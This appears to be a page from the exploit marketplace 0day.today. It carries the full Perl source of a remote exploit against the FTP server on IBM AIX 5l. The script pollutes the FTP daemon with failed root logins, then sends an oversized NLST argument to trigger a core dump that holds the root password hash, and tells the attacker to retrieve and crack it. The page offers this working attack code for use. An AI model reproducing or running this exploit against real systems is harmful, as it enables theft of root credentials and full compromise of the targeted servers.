0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
AIX5l with FTP-Server Remote Root Hash Disclosure Exploit
========================================================= AIX5l with FTP-Server Remote Root Hash Disclosure Exploit ========================================================= ### AIXCOREDUMP.PL --- ### --== ~ AIX5l w/ FTP-SERVER REMOTE ROOT HASH DISCLOSURE EXPLOIT ~ =-- ### CREATES COREDUMP INCLUDING THE ROOT USER HASH FROM /etc/security/passwd ### THE RESULT FILE IS SCRAMBLED - SEEK FOR DES LOOKING CRYPTO KEYS ### SUCCESSFULLY TESTED ON IBM AIX 5.1 ### DISCOVERED & EXPLOITED BY KINGCOPE ### JULY 2010 use IO::Socket; $|=1; print "--== ~ AIX5l w/ FTP-SERVER REMOTE ROOT HASH DISCLOSURE EXPLOIT ~ =--\n"; print "CREATES COREDUMP INCLUDING THE ROOT USER HASH FROM /etc/security/passwd\n"; print "BY KINGCOPE\n"; print "JULY 2010\n\n"; if ($#ARGV < 1) { print "USAGE: ./AIXCOREDUMP.PL <target address> <your ip> [username] [password]\n"; print "SAMPLES:\n"; print "YOU HAVE A LOGIN ./AIXCOREDUMP.PL 192.168.1.150 192.168.1.25 kcope passwd\n"; print "USE GUEST ACCOUNT - NEEDS WRITE ACCESS IN /PUB ./AIXCOREDUMP.PL 192.168.1.150 192.168.1.25\n"; exit; } $trgt = $ARGV[0]; $sock = IO::Socket::INET->new(PeerAddr => $trgt, PeerPort => '21', Proto => 'tcp'); srand(time()); $port = int(rand(31337-1022)) + 1025; $locip = $ARGV[1]; $locip =~ s/\./,/gi; if ($ARGV[2] eq "") { $user = "ftp"; $pass = "c0deb4b3\@roothash.com"; } else { $user = $ARGV[2]; $passwd = $ARGV[3]; } $x = <$sock>; print "*AIX EXPLOIT* REMOTE FTPD: $x\n"; if (fork()) { for ($k=0;$k<3;$k++) { print "*AIX EXPLOIT* POLLUTING FTPD***\n"; print "\t$x"; print $sock "USER root\r\n"; $x = <$sock>; print "\t$x"; print $sock "PASS sexy\r\n"; $x = <$sock>; print "\t$x"; } print "*AIX EXPLOIT* ACCESSING FOLDER***\n"; print $sock "USER $user\r\n"; $x = <$sock>; print "\t$x"; print $sock "PASS $passwd\r\n"; $x = <$sock>; print "\t$x"; if ($ARGV[2] eq "") { print "*AIX EXPLOIT* CWD TO PUB***\n"; print $sock "CWD pub\r\n"; $x = <$sock>; print "\t$x"; } print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n"; $x = <$sock>; print "\t$x"; print "*AIX EXPLOIT* TRIGGERING COREDUMP***\n"; print $sock "NLST ~" . "A" x 5000 . "\r\n"; $x = <$sock>; while(<$sock>) { print; } print "*AIX EXPLOIT* (SUCCESS)***\n*AIX EXPLOIT* NOW RETRIEVE THE core FILE WITH YOUR FAVOURITE CLIENT AND LOOKUP THE R00T HASH++CRACKIT!***\n"; exit; } else { my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1); die "Could not create socket: $!\n" unless $servsock; my $new_sock = $servsock->accept(); while(<$new_sock>) { print $_; } close($servsock); } ## CHEERIO! # 0day.today [2024-07-07] #